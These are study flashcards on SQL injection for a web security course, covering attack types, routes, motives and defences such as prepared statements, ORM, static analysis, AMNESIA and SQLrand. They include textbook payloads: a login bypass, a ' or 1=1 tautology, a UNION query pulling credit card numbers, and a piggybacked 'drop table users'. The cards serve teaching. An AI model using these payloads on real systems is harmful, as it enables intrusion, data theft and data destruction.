web attacks - sql injections Flashcards
what is sql
standard language for interacting with databases, very common with web applications
what is it used for in web applications
authentications : DB users and passwords
common password: data storage
how is it used in desktops and server apps
Email clients/servers
Photo applications, media servers
Custom database clients
Application data caches
what is network injections
usually considered the bigger risk
can be accessed by unknown users
network is a gateway crossing physical boundaries
risk in priviledged servers
what is local injections
local users can only deny access to themselves
desktop apps run as plain users , putting own data at risks
however:
drive by exloits attack locally growing concerns due to insider threats
Typical Setting for Attacks
1) presentation tier
2)logic tier
3) storage
what happens in the presentation tier
get victim
renders the html that is given from the logic tier
what happens in the logic tier
load compile and execute index.asp
sends html from the storage after the data is return from the storage
what happens in the storage tier
exeutes sql and returns data
what does this code accomplish?
$username = $HTTP_POST_VARS [ ’username ’ ];
$password = $HTTP_POST_VARS [ ’ passwd ’ ];
$query = “ SELECT * FROM logintable WHERE user = ’”
. $username . “ ’ AND pass = ’” . $password . “ ’ “;
…
$result = mysql_query ( $query ) ;
if (! $results )
die_bad_login () ;
this guarantees login!
write sql code that guarntees login
▶ User name: bob’ OR user<>’bob’
▶ Password: foo OR pass<>’foo’
SELECT * FROM logintable WHERE user = ’ bob ’ or user < > ’ bob ’ AND pass = ’ foo ’ OR pass < > ’ foo ’
what is an in - band fix
filtering
what does in-band fix :filtering do?
use filtering to escape black listed characters
php and mysql have functions to help do this
what is an out-band fix
Prepared statements
what does out-band fix:Prepared statements do?
uses a prepared query with parameters
parameters are safe substitued in sql statements
what is an alterative fix from filtering and prepared statements
ORM and LINQ
what is ORM used for?
Use Object-Relational Mapping (ORM) for structured DB access
what does orm stand for
Object-Relational Mapping
what is LINQ used for
Use LINQ in .NET to interact with databases safely
what is a more general out of band solution besides from prepared statements
A more general ”out-of-band” solution is to use embedded programming language support for
databases
what should we examine when trying to classify sql injections
▶ Route – where injection happens
▶ Motive — what it aims to achieve
▶ SQL code — the form of SQL injected
name the different types of injection routes
▶ User input e.g., web forms via HTTP GET or POST
▶ Cookies used by web apps to build queries
▶ Server variables logged by web apps (e.g., HTTP headers)
▶ Second-order injections where the injection is separated from attack
give me examples of a primary motive
▶ Extracting data
▶ Adding or modifying data
▶ Mounting a denial-of-service attack
▶ Bypassing authentication
▶ Executing arbitrary commands
give me examples of an auxiliary motive
finding injectable parameters
finding database schema
database server fingerprinting
escalating priviledge at a database level
forma of sql modes injected
tautologies
illegal or incorrect queries
union query
piggybacked queries
inference pairs
stored procedures or other dbms features
the injection may use alternate encodings to try to defeat sanitization
routines that don’t interpret them (e.g., char(120) instead of x)
what is a tautology
inject code into condition statements so they always evaluate to true
give example of tautology query
SELECT accounts FROM users WHERE
login = ’ ’ or 1=1 – AND pin =
why is blacklisting tautologies difficult
▶ Many ways of writing them: 1>0, ’x’ LIKE ’x’, etc.
▶ Quasi tautologies: very often true RAND()>0.01
what does an illegal/ incorrect query do
causes a run-time error , hopping to learn information from error response
give example of incorrect / illegal query
SELECT accounts FROM users WHERE
login = ’ ’ AND pin = convert ( int ,( select top 1 name from
sysobjects where xtype = ’u ’)
explain how illegal/incorrect query works
▶ Assumes MS SQL Server
▶ sysobjects is a server table of metadata
▶ Attempts to find first user table
▶ Converts name into an integer → Runtime error
what is a sysobject
server table of metadata
what does his error tell the attacker:
Microsoft OLE DB Provider for SQL Server (Ox80040E07)
Error converting nvarchar value ’CreditCards’
to a column of data type int
▶ MS SQL Server is running
▶ The first user-defined table is called CreditCards
what is a union query
injecting a second query using UNION
give example of union query
SELECT accounts FROM users WHERE
login = ’ ’ UNION SELECT cardNo from CreditCards where
acctNo =10032 – AND pin =
what is the effect of this union query?
SELECT accounts FROM users WHERE
login = ’ ’ UNION SELECT cardNo from CreditCards where
acctNo =10032 – AND pin =
▶ Suppose there are no tuples with login=’’
▶ May reveal cardNo for account 10032
give example of piggyback query
SELECT accounts FROM users WHERE
login = ‘ doe ‘; drop table users – ‘ AND pin
explain what this piggyback query does?
SELECT accounts FROM users WHERE
login = ‘ doe ‘; drop table users – ‘ AND pin
▶ Database parses second command after ;
▶ Executes second query, deleting users table
▶ Some servers don’t require the ; character!
what is an inference pair
even if error reponse is not visible we can gather information by observing the subtle differences between outputs.
what are the two techniques for inference pairs
blind injection
timing attack
With unlimited access, these techniques allow automated differential analysis
what is a blind injection
it exploites visible differences in responses
what is a timing attack
it exploits differences in response time based on boolean conditions (e.g using WAITFOR)
how to use blind injection to discover if login parameter in injectable
Step 1: Always true
login = ’ legalUser ’ and 1=1 – ’
Step 2: Always false
login = ’ legalUser ’ and 1=0 – ’
what is a stored procedure
custom sub routines that provide support for additional operations
what is a risk of stored procedure
if improperly sanitised , it can allows sql injectios insie the stored procedure
why are out of band fixes preferred
they reduce risk of sql injections
how to repair an sqli vunerability
Filtering to sanitize inputs
▶ Prepared queries (aka parameterized queries)
Both methods are server-side, so it is better to use database driver libraries to
abstract away from the underlying DBMS
what is dangerous about the xp cmdshell provided by mmicrodoft sql
allows execution of os commands
Mitigation:
▶ Since SQL Server 2005, this is disabled by default.
▶ But DB administrators can re-enable it.
▶ Worse, an attacker with SQLi access might be able to enable it
Lesson: Access control and passwords are critical inside the database!
How Do I Prevent SQLi Vulnerabilities BEFORE DEPLOYMENT
using programming languages, objrct relation mapping
manual code review or automatic static analysis
How Do I Prevent SQLi Vulnerabilities DURING TESTING OR DEPLOYMENT
pen testing tool
instrumented code
How Do I Prevent SQLi Vulnerabilities AFTER TESTING OR DEPLOYMENT
wait untill after code, manually investigate
use dynamic remediation plus alarms (app firewall or speciaised techniques)
what is the idea behind Static Prevention: Automated Analysis
use static code analysis to warn programmers or prohibit or fix vunerable code
what are the techniques used for Static Prevention: Automated Analysis
Detect suspicious code patterns, e.g., dynamic query construction
Use static taint analysis to detect data-flows from input parameters to queries
What is th use of AMNESIA in static analysis
use static analysis pre processing to create a sdynamic detection tool
how to use amnesia in static analysis?
- Find SQL query-generation points in code
- Build SQL-query model as NDFA which models SQL grammar, transition labels
are tokens - Instrument application to call runtime monitor
- If monitor detects violation of state machine, triggers error, preventing SQL query
what is an sql injection
attack that detects exploits securoty vulnerbaility in application software
Dynamic Prevention: SQLrand
Use instruction set randomization to change language dynamically to use
opcodes/keywords that attackers can’t easily guess
describe State Machine for SQL Production
Variable β: Matches any string in SQL grammar
▶ Spots violation in injectable parameters
▶ Aborts query if model not in accepting state
